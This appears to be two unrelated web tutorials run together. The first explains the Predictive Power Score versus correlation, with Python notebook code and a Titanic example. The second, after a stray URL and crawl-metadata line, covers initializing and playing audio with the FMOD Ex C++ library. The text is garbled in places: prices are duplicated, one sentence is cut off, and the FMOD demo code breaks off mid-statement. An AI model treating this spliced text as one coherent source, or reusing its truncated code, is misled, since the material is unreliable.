In statistics, correlation or dependence is any statistical relationship, whether causal or not, between two random variables or bivariate data. In the broadest sense, correlation is any statistical association, although it commonly refers to the degree to which a pair of variables are related linearly.
Known examples of dependent phenomena include the correlation between the height of parents and their children and the correlation between the price of a good and the quantity that consumers are willing to buy, as represented by the so-called demand curve. Correlations are useful because they can indicate a predictive relationship that can be exploited in practice.
For example, an electric utility may produce less energy on a warm day based on the correlation between electricity demand and climate. In this example, there is a causal relationship because extreme weather causes people to use more electricity to heat or cool themselves
However, in general, the presence of a correlation is not sufficient to infer the presence of a causal relationship (i.e., correlation does not imply causality). Formally, random variables are dependent if they do not satisfy a mathematical property of probabilistic independence. In informal language, correlation is synonymous with dependence.
Essentially, correlation is the measure of how two or more variables relate to each other. There are several correlation coefficients. The most common of these is Pearson’s correlation coefficient, which is sensitive only to a linear relationship between two variables (which may be present even when one variable is a non-linear function of the other)
Other correlation coefficients — such as Spearman’s range correlation — have been developed to be more robust than Pearson’s, i.e. more sensitive to non-linear relationships. Mutual information can also be applied to measure the dependence between two variables. Here we can see correlations with a value of
0, but that there is indeed some kind of correlation:
Correlations are scored from -1 to 1 and indicate whether there is a strong linear relationship — either in a positive or negative direction. However, there are many non-linear relationships that this type of score simply will not detect. In addition, the correlation is only defined for the numerical columns. So, we leave out all the categorical columns.
The same will happen if you transform the categorical columns because they are not ordinal and if we do
OneHotEncoding we will end up with an array with many different values (with high cardinality). The symmetry in the correlations means that the correlation is the same whether we calculate the correlation of A and B or the correlation of B and A. However, relationships in the real world are rarely symmetrical. More often, relationships are asymmetrical
A quick example: a column with 2 unique values (
True or
False for example) will never be able to perfectly predict another column with
100 unique values. But the opposite could be true. Clearly, asymmetry is important because it is very common in the real world.
Have you ever asked:
- Is there a score that tells us if there is any relationship between two columns — no matter if the relationship is linear, non-linear, Gaussian, or some other type of relationship?
- Of course, the score should be asymmetrical because I want to detect all the strange relationships between two variables.
- The score should be
0if there is no relationship and the score should be
1if there is a perfect relationship
- And that the score helps to answer the question Are there correlations between the columns? with a correlation matrix, then you make a scatter plot over the two columns to compare them and see if there is indeed a strong correlation.
- And like the icing on the cake, the score should be able to handle both categorical and numerical columns by default.
In short, an asymmetric and data-type agnostic score for predictive relationships between two columns ranging from
0 to
1. Well, there is the Predictive Power Score library and it can be found at the following link: Predictive Power Score
So, let’s work at the library in this notebook!
Note: you can download the notebook here.
First, we need to install it
In [1]:
!pip3 install ppscore
Calculating the Predictive Power Score
First of all, there is no single way to calculate the Predictive Power Score. In fact, there are many possible ways to calculate a score that meets the requirements mentioned above. So, let’s rather think of the Predictive Power Score as a framework for a family of scores. Let’s say we have two columns and we want to calculate the PPS of
X predicting
Y. In this case, we treat
Y as our target variable and
X as our (only) characteristic.
We can now calculate a cross-validated Decision Tree and calculate an appropriate evaluation metric.
- When the objective is numerical we can use a Regression Decision Tree and calculate the Mean Absolute Error (MAE).
- When the objective is categorical, we can use a Classification Decision Tree and calculate the weighted F1
You can also use other scores like ROC, etc. but let’s leave those doubts aside for a second because we have another problem. Most evaluation metrics do not make sense if you do not compare them to a baseline. It doesn’t matter if we have a score of
0.9 if there are possible scores of
0.95. And it would matter a lot if you are the first person who achieves a score higher than
0.7. Therefore, we need to “normalize” our evaluation score. And how do you normalize a score? You define a lower and an upper limit and put the score in perspective
So what should be the upper and lower limits? Let’s start with the upper limit because this is usually easier: a perfect
F1 is
1. A perfect
MAE is
0.
But what about the lower limit? Actually, we cannot answer this in absolute terms. The lower limit depends on the evaluation metric and its data set. It is the value reached by a “naïve” predictor.
But what is a naive model? For a classification problem, always predicting the most common class is quite naive. For a regression problem, always predicting the median value is quite naive.
Predictive Power Score VS Correlation
To get a better idea of the Predictive Power Score and its differences with the correlation let’s see this versus. We now have the correlations between
x and
y and vice versa
Let’s do with this equation from PPS
In [2]:
import pandas as pd import numpy as np import ppscore as pps
We’ve imported Pandas, Numpy, and PPS
In [3]:
df = pd.DataFrame()
We’ve now created an empty Pandas DataFrame
In [4]:
df
Out[4]:
According to the formula above we need to create the values of features
X, ranging from
-2 to
+2, and we do it as a uniform distribution with Numpy, and we’ll create
10.000 samples and we assign these values to a new column of the empty dataframe called
X
Following the same formula also we will need to create a new column called
error by assigning the values from
-0.5 to
0.5 as uniform distribution and with the same number of samples. We will do the same with Numpy
In [5]:
df["x"] = np.random.uniform(-2, 2, 10000)
In [7]:
df.head()
In [8]:
df["error"] = np.random.uniform(-0.5, 0.5, 10000)
In [9]:
df.head()
Out[9]:
Your data will be different, because is randomly generated.
Great! We have the first half of the formula re-created. Now we’ll need to replicate and create
Y
In [10]:
df["y"] = df["x"] * df["x"] + df["error"]
In [11]:
df.head()
Out[11]:
Very easy, here we follow the formula. Now we want to see the correlations between
X and
Y. For this, we will use the
.corr() of Pandas. For more info here about cor() here. We have two ways to run it:
- 1- On the column:
In [12]:
df["x"].corr(df["y"])
Out[12]:
-0.0115046561021449
- 2- On the DataFrame
In [13]:
df.corr()
Out[13]:
As we can see, the conclusion we would reach here is that the correlation between
X and
Y is not a strong correlation, since the value is
-0.011, which indicates a slight negative correlation. Remember that a strong positive correlation is equal to
1, and a strong negative correlation is equal to
-1 (we saw it in the graphs above). But what happens if we execute this same correlation but with Predictive Power Score? Let’s do it. Based on the above dataframe we can calculate the PPS of
x by predicting
y:
In [14]:
pps.score(df, "x", "y")
Out[14]:
{'x': 'x', 'y': 'y', 'ppscore': 0.675090383548477, 'case': 'regression', 'is_valid_score': True, 'metric': 'mean absolute error', 'baseline_score': 1.025540102508908, 'model_score': 0.33320784136182485, 'model': DecisionTreeRegressor()}
Here we obtain a value of
0.67 which is an indicator of a high positive correlation. Using only the Pandas
corr() we could have lost the predictive power of this variable! Here you can see that this correlation is non-linear
Image By Author
What happens now if we reverse the correlation? Trying to predict
X based on
Y? Let’s see it
In [15]:
pps.score(df, "y", "x")
Out[15]:
{'x': 'y', 'y': 'x', 'ppscore': 0, 'case': 'regression', 'is_valid_score': True, 'metric': 'mean absolute error', 'baseline_score': 1.0083196087945172, 'model_score': 1.1336852173737795, 'model': DecisionTreeRegressor()}
The correlation is now
0, so it has no correlation, meaning that we are facing an asymmetric correlation! Let’s see more details about the PPS library
In [16]:
pps.predictors(df, "y")
Out[16]:
In [17]:
pps.predictors(df, "x")
Out[17]:
With
.predictors we can get a clearer idea of what is going on under the hood. In which we can see the metrics and the models used. We can also access the
.matrix method with the next command
In [18]:
pps.matrix(df)
Out[18]:
This is how we can calculate the PPS matrix between all columns
Analyzing & visualizing results
We call these non-linear effects and asymmetry. Let’s use a typical quadratic relationship: the feature
x is a uniform variable ranging from
-2 to
2 and the target
y is the square of
x plus some
error. In this case,
x can predict very well
y because there is a clear non-linear, quadratic relationship, this is how we generate the data, after all. However, this is not true in the other direction from
y to
x. For example, if
y is 4, it is impossible to predict whether
x was approximately
2 or
-2
Therefore, the prediction ratio of
x to
y is
0.67, detecting the non-linear relationship and saving the day. However, the PPS is not
1 because there is some error in the relationship. In the other direction, the PPS of
y to
x is
0 because its prediction cannot be better than the naive baseline and therefore the score is
0.
You can use seaborn or your favorite library to view the results.
Viewing PPS predictors:
In [19]:
import seaborn as sns predictors_df = pps.predictors(df, y="y") sns.barplot(data=predictors_df, x="x", y="ppscore")
Out[19]:
Visualizing the PPS matrix:
(This needs some minor pre-processing because
seaborn.heatmap unfortunately does not accept sorted data)
In [20]:
matrix_df = pps.matrix(df)[['x', 'y', 'ppscore']].pivot(columns='x', index='y', values='ppscore')matrix_df
Out[21]:
In [22]:
sns.heatmap(matrix_df, vmin=0, vmax=1, cmap="Blues", linewidths=0.5, annot=True)
Out[22]:
It is clear, with this visualization, that we are having a good result with the correlation between
x and
y, but not in the opposite way.
Example with Categorical Features
Comparing the correlation matrix with the PPS matrix of the Titanic data set will give you some new ideas.
The correlation matrix is smaller and leaves out many interesting relationships. Of course, that makes sense because columns like
Sex,
TicketID or
Port are categorical and the correlation cannot be computed for them. The correlation matrix shows a negative correlation between
TicketPrice and
Class
(-0.55)
We can check this relationship if we take a look at the PPS. We will see that the
TicketPrice is a strong predictor for the
Class
(0.9 PPS) but not the other way around. The
Class feature only predicts the
TicketPrice with a PPS of
0.2
This makes sense because if your ticket costs 5,000or5,000or10,000 it’s most likely in the higher class. Conversely, if you know someone was in the highest class you can’t tell whether they paid 5,000or5,000or10,000 for their ticket. In this scenario, the asymmetry of the PPS shines through again.
The first row of the matrix tells you that the best univariate predictor of the
"Survived" column is the
"Sex" column. This makes sense because women were prioritized during the rescue. (We could not find this information in the correlation matrix because the
Sex column was eliminated).
If you look at the
TicketID column, you can see that
TicketID is a pretty good predictor for a range of columns. If you dig deeper into this pattern, you will discover that several people had the same
TicketID. Therefore, the
TicketID actually refers to a latent group of passengers who bought the ticket together, for example, the big Italian family Rossi who turns any night into a show. Thus, the PPS helped you to detect a hidden pattern.
What’s even more surprising than the strong predictive power of
TicketID is the strong predictive power of
TicketPrice across a wide range of columns. Especially, the fact that
TicketPrice is quite good at predicting
TicketID (0.67) and vice versa
(0.64)
Upon further investigation, you will discover that the tickets were often uniquely priced. For example, only the Italian Rossi family paid a price of $72.50. This is a critical view! It means that the
TicketPrice contains information about the
TicketID and therefore about our Italian family. Information that you need to have when you consider a possible leakage of information.
By looking at the PPS matrix, we can see the effects that could be explained by the causal chains. For example, you would be surprised why
TicketPrice has predictive power on the survival rate
(PPS 0.39). But if you know that the
Class influences your survival rate
(PPS 0.36) and that
TicketPrice is a good predictor for your
Class (PPS 0.9), then you might have found an explanation
Disclosure
PPS clearly has some advantages over correlation in finding predictive patterns in the data. However, once patterns are found, correlation is still a great way to communicate the linear relationships found. Therefore, you can use the PPS matrix as an alternative to the correlation matrix to detect and understand linear or non-linear patterns in your data
Limitations
- The calculation is slower than the correlation (matrix).
- The score cannot be interpreted as easily as the correlation because it does not tell you anything about the type of relationship that was found. Therefore, the PPS is better at finding patterns but the correlation is better at communicating the linear relationships found.
- You cannot compare the scores of different target variables in a strictly mathematical way because they are calculated using different evaluation metrics. Scores are still valuable in the real world, but this must be kept in mind.
- There are limitations to the components used under the hood
Conclusions
- In addition to your usual feature selection mechanism, you can use the PPS to find good predictors for your target column.
- You can also remove features that only add random noise.
- Those features sometimes still score high on the feature importance metric.
- You can remove features that can be predicted by other features because they do not add new information
- You can identify pairs of mutually predictive characteristics in the PPS matrix — this includes strongly correlated characteristics but will also detect non-linear relationships.
- Detect leakage: Use the PPS matrix to detect leakage between variables — even if the leakage is mediated by other variables.
- Data normalization: Find entity structures in the data by interpreting the PPS matrix as a directed graph. This can be surprising when the data contain latent structures that were previously unknown. For example, the TicketID in the Titanic data set is often a flag for a
References
I have written this other Notebook about Datetimes in Python. I invite you to read it!
I hope you enjoyed this reading! you can follow me on Twitter or LinkedIn
Thank you for reading!
Leave a Reply Your email address will not be published. Required fields are marked * | https://www.analyticsvidhya.com/blog/2020/12/using-predictive-power-score-to-pinpoint-non-linear-correlations/ | CC-MAIN-2022-33 | refinedweb | 2,805 | 55.64 |
On Thu, 2004-04-15 at 09:25, Jim Fulton wrote:
From the zope package README.txt:
"Zope Project Packages
The zope package is a pure namespace package holding packages developed as part of the Zope 3 project.
Advertising
Generally, the immediate subpackages of the zope package should be useful and usable outside of the Zope application server. Subpackages of the zope package should have minimal interdependencies, although most depend on zope.interfaces.
Speaking as someone who's tried to use zope subpackages outside of z3, there are practical problems with this. About 8 months ago, I tried to pull ZPT, et al out to use as a standalone version. I ended up having to grab zope.interfaces, zope.pagetemplates, zope.tal, zope.tales, and zope.i18n. All make sense (especially since I wanted internationalized ZPT), but tracking all the dependencies were difficult. I tried to update all that again a few weeks ago and found that I also now needed zope.i18nmessageid and zope.schema.
It looks like Fred's packaging work will help with the very tricky task
of figuring out the dependencies and creating distutils packages for the
desired stuff.
Eactly. Freds work is going to adress this problem. (I'll restrain myself from going into a tirade about how important this is for Python. :)
I've also heard that zope.schema is going away
I thin it will eventually be merged into zope.interface.
> and that
the dependency on both zope.i18n and zope.i18nmessageid might not be necessary.
Right, maybe
But I'm still concerned that there will be creeping dependencies among more things inside the zope package, making it harder to use some of those technologies independently. E.g. there are several standalone ZPT implementations in the wild, but I happen to think z3's is the best and would like to see it adopted more widely in the Python world.
We're aware of this problem. That's why we've decoded to make the dependency data explicit (manually created) rather than implicit (automatically created).
Each separately distributed package will have a DEPENDENCIES.cfg that is created by hand and that *constrains* dependencies on other packages. It makes explicit the intended dependencies. Dependencies not listed here are bugs. Adding depenencies to this file should be considered a big deal.
Also, for a long time I've wanted to see z3's interfaces package be used outside Zope3, perhaps even being adopted as a standard library package eventually. I wonder if living inside the zope container package helps or hurts those prospects.
Probably neither. I doubt that there will ever be a standard Python interface system. I'm not going to hold my breath. Guido argued for having Zope's interfaces be in s subpackage (or have a weird name) specifically to make it easier to add a standard interface package later, assuming that a standard package might not be exactly the same as Zope's.
I understand the desire to carve out a package namespace that z3 can reliably use without risk of collision with other packages. I still think that's less of a practical concern in the Python world
We've had colisions in the past. That's why we're being careful now.
(BTW, I think it was a mistake to have top-level persistent and transaction packages. I think that will eventually come back to haunt us.)
The only way to avoid collissions is to pick stupid names (zthis, zthat). I much prefer z.this to zthis. This assumes that we can make it easy to install z.this into z.
> so I'd opt
for an approach that gets the non-Zope specific technologies into the most hands of Python programmers.
I think that that's a different discussion. The safest thing to do for now is to continue using a container package.
Jim
-- Jim Fulton mailto:[EMAIL PROTECTED] Python Powered! CTO (540) 361-1714 Zope Corporation
_______________________________________________
Zope-Dev maillist - [EMAIL PROTECTED]
** No cross posts or HTML encoding! **
(Related lists - ) | https://www.mail-archive.com/zope-dev@zope.org/msg15877.html | CC-MAIN-2016-44 | refinedweb | 673 | 66.64 |
Language in C Interview Questions and Answers
Ques 46. How do I print a floating-point number with higher precision say 23.34568734 with only precision up to two decimal places?
Ans. This can be achieved through the use of suppression char '*' in the format string of printf( ) as shown in the following program.
main( )
{
int i = 2 ;
float f = 23.34568734 ;
printf ( "%.*f", i, f ) ;
}
The output of the above program would be 23.35.
Is it helpful? Add Comment View Comments
Ques 47. Are the expressions *ptr++ and ++*ptr same?
Ans. No. *ptr++ increments the pointer and not the value pointed by it, whereas ++*ptr increments the value being pointed to by ptr.
Is it helpful? Add Comment View Comments
Ques 48. strpbrk( )
Ans. The function strpbrk( ) takes two strings as parameters. It scans the first string, to find, the first occurrence of any character appearing in the second string. The function returns a pointer to the first occurrence of the character it found in the first string. The following program demonstrates the use of string function strpbrk( ).
#include <string.h>
main( )
{
char *str1 = "Hello!" ;
char *str2 = "Better" ;
char *p ;
p = strpbrk ( str1, str2 ) ;
if ( p )
printf ( "The first character found in str1 is %c", *p ) ;
else
printf ( "The character not found" ) ;
}
The output of the above program would be the first character found in str1 is e
div( )...
The function div( ) divides two integers and returns the quotient and remainder. This function takes two integer values as arguments; divides first integer with the second one and returns the answer of division of type div_t. The data type div_t is a structure that contains two long ints, namely quot and rem, which store quotient and remainder of division respectively. The following example shows the use of div( ) function.
#include <stdlib.h>
void main( )
{
div_t res ;
res = div ( 32, 5 ) ;
printf ( "\nThe quotient = %d and remainder = %d ", res.quot, res.rem ) ;
Is it helpful? Add Comment View Comments
Ques 49. Can we convert an unsigned long integer value to a string?
Ans. The function ultoa( ) can be used to convert an unsigned long integer value to a string. This function takes three arguments, first the value that is to be converted, second the base address of the buffer in which the converted number has to be stored (with a string terminating null character '\0') and the last argument specifies the base to be used in converting the value. Following example demonstrates the use of this function.
#include <stdlib.h>
void main( )
{
unsigned long ul = 3234567231L ;
char str[25] ;
ultoa ( ul, str, 10 ) ;
printf ( "str = %s unsigned long = %lu\n", str, ul ) ;
}
Is it helpful? Add Comment View Comments
Ques 50. ceil( ) and floor( )
Ans. The math function ceil( ) takes a double value as an argument. This function finds the smallest possible integer to which the given number can be rounded up. Similarly, floor( ) being a math function, takes a double value as an argument and returns the largest possible integer to which the given double value can be rounded down. The following program demonstrates the use of both the functions.
#include <math.h>
void main( )
{
double no = 1437.23167 ;
double down, up ;
down = floor ( no ) ;
up = ceil ( no ) ;
printf ( "The original number %7.5lf\n", no ) ;
printf ( "The number rounded down %7.5lf\n", down ) ;
printf ( "The number rounded up %7.5lf\n", up ) ;
}
The output of this program would be,
The original number 1437.23167
The number rounded down 1437.00000
The number rounded up 1438.00000
Is it helpful? Add Comment View Comments
Most helpful rated by users:
- What will be the output of the following code?
void main ()
{ int i = 0 , a[3] ;
a[i] = i++;
printf ("%d",a[i]) ;
}
- Why doesn't the following code give the desired result?
int x = 3000, y = 2000 ;
long int z = x * y ;
- Why doesn't the following statement work?
char str[ ] = "Hello" ;
strcat ( str, '!' ) ;
- How do I know how many elements an array can hold?
- How do I compare character data stored at two different memory locations? | http://www.withoutbook.com/Technology.php?tech=11&page=10&subject= | CC-MAIN-2018-34 | refinedweb | 679 | 75.2 |
Thursday, March 24, 2016¶
super() in the
__str__() of a python_2_unicode_compatible¶
Here is now how to reproduce #844.
The following code snippet was used to reproduce #844:
>>> from lino import startup >>> startup('lino_welfare.projects.std.settings.doctests') >>> from lino.api.doctest import * >>> obj = households.Member() >>> print(obj) Member object
Explanation starts in
lino_xl.lib.households.models which
defines:
@python_2_unicode_compatible class Member(mixins.DatePeriod): def __str__(self): if self.person_id is None: return super(Member, self).__str__() if self.role is None: return unicode(self.person) return u"%s (%s)" % (self.person, self.role)
This code, on its own, is not problematic. The problem comes only when
Lino Welfare extends the Member model. In
lino_welfare.modlib.households.models it says:
class Member(Member, mixins.Human, mixins.Born): ...
And in
lino.mixins.human we have:
from lino_xl.lib.households.models import * @python_2_unicode_compatible class Human(model.Model): def __str__(self): return self.get_full_name(nominative=True)
The rule of thumb is: Don’t use :func:`super` in the :meth:`__str__` method of a `python_2_unicode_compatible` model.
My explanation is that python_2_unicode_compatible causes something
to get messed up with the mro for the
__str__() method, but I
wont’t dive deeper into this right now because my problem was fixed by
changing the relevant line:
return super(Member, self).__str__()
into an explicit copy of the code which I want to run there (defined
in the
super() of Django’s
Model class):
return str('%s object' % self.__class__.__name__)
I added a section about “Member objects” in Households to cover it.
Moving from fabric to invoke¶
I wanted to get the Lino test suite pass on Travis CI. It took me
almost the whole day. Lots of subtle changes in
atelier.
The main problem was to understand how invoke does configuration and to decide how to store current_project and how to define configration variables. I added an invoke.yaml to most projects.
Many more
inv commands now work.
fab bd was the easiest: it simply wasn’t yet imported into the
atelier.tasks module.
There was a bug in
atelier.utils.confirm() which made it fail
under Python 2 when the prompt was a unicode string with non-ascii
characters.
# -*- coding: UTF-8 -*- from __future__ import unicode_literals from atelier.utils import confirm confirm("Ein schöner Tag?")
Above script gives:
Traceback (most recent call last): File "0324.py", line 4, in <module> confirm("Ein schöner Tag?") File "/atelier/atelier/utils.py", line 213, in confirm ln = input(prompt) UnicodeEncodeError: 'ascii' codec can't encode character u'\xf6' in position 7: ordinal not in range(128)
A simplified version:
# -*- coding: UTF-8 -*- from __future__ import unicode_literals from atelier.utils import confirm confirm("Ein schöner Tag?")
But finally I can not do:
$ pp inv clean $ pp inv prep test bd pd
I released Atelier 0.0.20 to PyPI (needed because Travis CI uses the released version)
And the reward: the Lino test suite now passes on Travis CI using invoke instead of fabric! At least for Python 2. | http://luc.lino-framework.org/blog/2016/0324.html | CC-MAIN-2018-05 | refinedweb | 500 | 52.46 |
Cutting.
Getting Started
First, download the FMOD Ex Programmers API. You’ll want the latest Stable version. After the installation completes, open Visual Studio and create an empty Win32 console project.
Right-click on the project node in Solution Explorer, select Properties, choose VC++ Directories in the left-hand pane and add the following directory paths:
Include Directories: C:\Program Files (x86)\FMOD SoundSystem\FMOD Programmers API Windows\api\inc
Library Directories: C:\Program Files (x86)\FMOD SoundSystem\FMOD Programmers API Windows\api\lib
In the Linker -> Input section, add fmodex_vc.lib to the Additional Dependencies.
Finally, when your application runs, you’ll need fmodex.dll to be in the same folder as your exe file, so to make things simple you can add a post-build event to copy this automatically from the FMOD API directory to your target folder when the build succeeds. Go to Build Events -> Post-build Event and set the Command Line as follows:
copy /y “C:\Program Files (x86)\FMOD SoundSystem\FMOD Programmers API Windows\api\fmodex.dll” “$(OutputPath)”
When you start writing your application, you’ll want to include the following headers:
#include "fmod.hpp" #include "fmod_errors.h" #include
Since most FMOD functions return an error code, it is also handy to have some kind of error checking function you can wrap around all the calls, like this:
void FMODErrorCheck(FMOD_RESULT result) { if (result != FMOD_OK) { std::cout << "FMOD error! (" << result << ") " << FMOD_ErrorString(result) << std::endl; exit(-1); } }
Initializing FMOD
The following code is adapted from the ‘Getting Started with FMOD for Windows’ PDF file which is included with the API and can be found in your Windows Start Menu under FMOD Sound System. I have made some small tweaks and added further explanation below.
First we’ll want to get a pointer to
FMOD::System, which is the base interface from which all the other FMOD objects are created:
FMOD::System *system; FMOD_RESULT result; unsigned int version; int numDrivers; FMOD_SPEAKERMODE speakerMode; FMOD_CAPS caps; char name[256]; // Create FMOD interface object result = FMOD::System_Create(&system); FMODErrorCheck(result);
Then we want to check that the version of the DLL is the same as the libraries we compiled against:
// Check version result = system->getVersion(&version); FMODErrorCheck(result); if (version < FMOD_VERSION) { std::cout << "Error! You are using an old version of FMOD " << version << ". This program requires " << FMOD_VERSION << std::endl; return 0; }
Next, count the number of sound cards in the system, and if there are no sound cards present, disable sound output altogether:
// Get number of sound cards result = system->getNumDrivers(&numDrivers); FMODErrorCheck(result); // No sound cards (disable sound) if (numDrivers == 0) { result = system->setOutput(FMOD_OUTPUTTYPE_NOSOUND); FMODErrorCheck(result); }
If there is one sound card, get the speaker mode (stereo, 5.1, 7.1 etc.) that the user has selected in Control Panel, and set FMOD’s speaker output mode to match. The first parameter is the driver ID – where 0 is the first enumerated sound card (driver) and
numDrivers - 1 is the last. The third parameter receives the default sound frequency; we have set this to zero here as we’re not interested in retrieving this data.
//);
If hardware acceleration is disabled in Control Panel, we need to make the software buffer larger than the default to help guard against skipping and stuttering. The first parameter specifies the number of samples in the buffer, and the second parameter specifies the number of buffers (which are used in a ring). Therefore the total number of samples to be used for software buffering is the product (multiplication) of the two numbers.
// Increase buffer size if user has Acceleration slider set to off if (caps & FMOD_CAPS_HARDWARE_EMULATED) { result = system->setDSPBufferSize(1024, 10); FMODErrorCheck(result); }
The following is a kludge for SigmaTel sound drivers. We first get the name of the first enumerated sound card driver by specifying zero as the first parameter to
getDriverInfo (the 4th parameter receives the device GUID which we ignore here). If it contains the string ‘SigmaTel’, the output format is changed to PCM floating point, and all the other format settings are left as the sound card’s current settings.
//); } }
We have now done all the necessary pre-requisite legwork and we can now initialize the sound system:
// Initialise FMOD result = system->init(100, FMOD_INIT_NORMAL, 0);
The first parameter defines the number of virtual channels to use. This can essentially be any number: whenever you start to play a new sound or stream, FMOD will (by default) pick any available free channel. The number of actual hardware channels (voices) available is irrelevant as FMOD will downmix where needed to give the illusion of more channels playing than there actually are in the hardware. So just pick any number that is more than the total amount of sounds that will ever be playing simultaneously in your application. If you choose a number lower than this, channels will get re-used and already running sounds will get cut off and replaced by new ones if you try to start a sound when all channels are busy (the oldest used channel is re-used first).
The second parameter gives initialization parameters and the third number specifies driver-specific information (the example given in the documentation is a filename when using the WAV-writer). The initialization parameter will usually be
FMOD_INIT_NORMAL, but for example if you are developing for PlayStation 3, you might use a parameter like
FMOD_INIT_PS3_PREFERDTS to prefer DTS output over Dolby Digital.
If the speaker mode we selected earlier is for some strange reason invalid,
init() will return
FMOD_ERR_OUTPUT_CREATEBUFFER. In this case, we reset the speaker mode to a safe fallback option – namely stereo sound – and call
init());
All of the code above should be included in every application you write which uses FMOD. With this boilerplate code out of the way, we can get to the business of making some noise!
Playing sounds and songs
There are two main ways to get audio into FMOD –
createSound and
createStream.
createSound loads a sound file into memory in its entirety, and decompresses it if necessary, whereas
createStream opens a file and just buffers it a piece at a time, decompressing each buffered segment on the fly during playback. Each option has its advantages and disadvantages, but in general music should be streamed since decompressing an MP3 or Vorbis file of some minutes length in memory will consume some 10s of megabytes, whereas sound effects that will be used repeatedly and are relatively short can be loaded into memory for quick access.
To load a sound into memory:
FMOD::Sound *audio; system->createSound("Audio.mp3", FMOD_DEFAULT, 0, &audio);
To open a stream:
FMOD::Sound *audioStream; system->createStream("Audio.mp3", FMOD_DEFAULT, 0, &audioStream);
The first parameter is the relative pathname of the file to open and the 4th parameter is a pointer to an
FMOD::Sound pointer that receives the resource handle of the audio. Under normal circumstances the 2nd and 3rd parameters should be left as
FMOD_DEFAULT and
0 (the 2nd is the mode in which to open the audio, the 3rd is an extended information structure used in special cases – we will come to this in Part 3 of the series).
Playing a one-shot sound
To play a sound that doesn’t loop and which you don’t otherwise need any control over, call:
system->playSound(FMOD_CHANNEL_FREE, audio, false, 0);
This is the same whether you are playing a sound or a stream; you use
playSound in both cases.
FMOD_CHANNEL_FREE causes FMOD to choose any available unused virtual channel on which to play the sound as mentioned earlier. The 2nd parameter is the audio to play. The third parameter specifies whether the sound should be started paused or not. This is useful when you wish to make changes to the sound before it begins to play.
If you need control of the sound after it starts, use the 4th parameter to receive the handle of the channel that the sound was assigned to:
FMOD::Channel *channel; system->playSound(FMOD_CHANNEL_FREE, audio, false, &channel);
These calls are non-blocking so they return as soon as they are processed and the sound plays in the background (in a separate thread).
Manipulating the channel
Once a sound is playing and you have the channel handle, all future interactions with that sound take place through the channel. For example, to make a sound loop repeatedly:
channel->setMode(FMOD_LOOP_NORMAL); channel->setLoopCount(-1);
To toggle the pause state of the sound:
bool isPaused; channel->getPaused(&isPaused); channel->setPaused(!isPaused);
To change the sound volume, specify a float value from 0.0 to 1.0, eg for half volume:
channel->setVolume(0.5f);
Per-frame update
Although it’s only needed on certain devices and in certain environments, it is best to call FMOD’s update function on each frame (or cycle of your application’s main loop):
system->update();
This causes OSs such as Android to be able to accept incoming phone calls and other notifications.
Releasing resources
Release the FMOD interface when you are finished with it (generally, when the application is exiting):
system->release();
This will cause all channels to stop playing, and for the channels and main interface to be released. Channels therefore don’t need to be released when the application ends, but sounds should be released when you’re done with them (thanks to David Gouveia for the correction!):
audio->release();
Don’t forget to error check
Everything above should be wrapped in calls to our
FMODErrorCheck() function above or some other error-trapping construct. I have just omitted this in the examples for clarity.
Demo application
All of the techniques shown in this article can be seen in this FMOD Demo console application, which shows how to open and play sounds and streams and how to do a smooth volume fade from one track to another. Full source code and the compiled executable are included. The source code can also be seen here for your convenience:
#include "fmod.hpp" #include "fmod_errors.h" #include <iostream> #include <Windows.h> #define _USE_MATH_DEFINES #include <math.h> void FMODErrorCheck(FMOD_RESULT result) { if (result != FMOD_OK) { std::cout << "FMOD error! (" << result << ") " << FMOD_ErrorString(result) << std::endl; exit(-1); } } int main() { // ================================================================================================ // Application-independent initialization // ================================================================================================ FMOD::System *system; FMOD_RESULT result; unsigned int version; int numDrivers; FMOD_SPEAKERMODE speakerMode; FMOD_CAPS caps; char name[256]; // Create FMOD interface object result = FMOD::System_Create(&system); FMODErrorCheck(result); // Check version result = system->getVersion(&version); FMODErrorCheck(result); if (version < FMOD_VERSION) { std::cout << "Error! You are using an old version of FMOD " << version << ". This program requires " << FMOD_VERSION << std::endl; return 0; } // Get number of sound cards result = system->getNumDrivers(&numDrivers); FMODErrorCheck(result); // No sound cards (disable sound) if (numDrivers == 0) { result = system->setOutput(FMOD_OUTPUTTYPE_NOSOUND); FMODErrorCheck(result); } //); // Increase buffer size if user has Acceleration slider set to off if (caps & FMOD_CAPS_HARDWARE_EMULATED) { result = system->setDSPBufferSize(1024, 10); FMODErrorCheck(result); } //); } } // Initialise FMOD result = system->init(100, FMOD_INIT_NORMAL,); // ================================================================================================ // Application-specific code // ================================================================================================ bool quit = false; bool fading = false; int fadeLength = 3000; int fadeStartTick; // Open music as a stream FMOD::Sound *song1, *song2, *effect; result = system->createStream("Song1.mp3", FMOD_DEFAULT, 0, &song1); FMODErrorCheck(result); result = system->createStream("Song2.mp3", FMOD_DEFAULT, 0, &song2); FMODErrorCheck(result); // Load sound effects into memory (not streaming) result = system->createSound("Effect.mp3", FMOD_DEFAULT, 0, &effect); FMODErrorCheck(result); // Assign each song to a channel and start them paused FMOD::Channel *channel1, *channel2; result = system->playSound(FMOD_CHANNEL_FREE, song1, true, &channel1); FMODErrorCheck(result); result = system->playSound(FMOD_CHANNEL_FREE, song2, true, &channel2); FMODErrorCheck(result); // Songs should repeat forever channel1->setLoopCount(-1); channel2->setLoopCount(-1); // Print instructions std::cout << "FMOD Simple Demo - (c) Katy Coe 2012 -" << std::endl << "=====================================================" << std::endl << std::endl << "Press:" << std::endl << std::endl << " 1 - Toggle song 1 pause on/off" << std::endl << " 2 - Toggle song 2 pause on/off" << std::endl << " F - Fade from song 1 to song 2" << std::endl << " S - Play one-shot sound effect" << std::endl << " Q - Quit" << std::endl; while (!quit) { // Per-frame FMOD update FMODErrorCheck(system->update()); // Q - Quit if (GetAsyncKeyState('Q')) quit = true; // 1 - Toggle song 1 pause state if (GetAsyncKeyState('1')) { bool isPaused; channel1->getPaused(&isPaused); channel1->setPaused(!isPaused); while (GetAsyncKeyState('1')); } // 2 - Toggle song 2 pause state if (GetAsyncKeyState('2')) { bool isPaused; channel2->getPaused(&isPaused); channel2->setPaused(!isPaused); while (GetAsyncKeyState('2')); } // F - Begin fade from song 1 to song 2 if (GetAsyncKeyState('F')) { channel1->setVolume(1.0f); channel2->setVolume(0.0f); channel1->setPaused(false); channel2->setPaused(false); fading = true; fadeStartTick = GetTickCount(); while (GetAsyncKeyState('F')); } // Play one-shot sound effect (without storing channel handle) if (GetAsyncKeyState('S')) { system->playSound(FMOD_CHANNEL_FREE, effect, false, 0); while (GetAsyncKeyState('S')); } // Fade function if fade is in progress if (fading) { // Get volume from 0.0f - 1.0f depending on number of milliseconds elapsed since fade started float volume = min(static_cast<float>(GetTickCount() - fadeStartTick) / fadeLength, 1.0f); 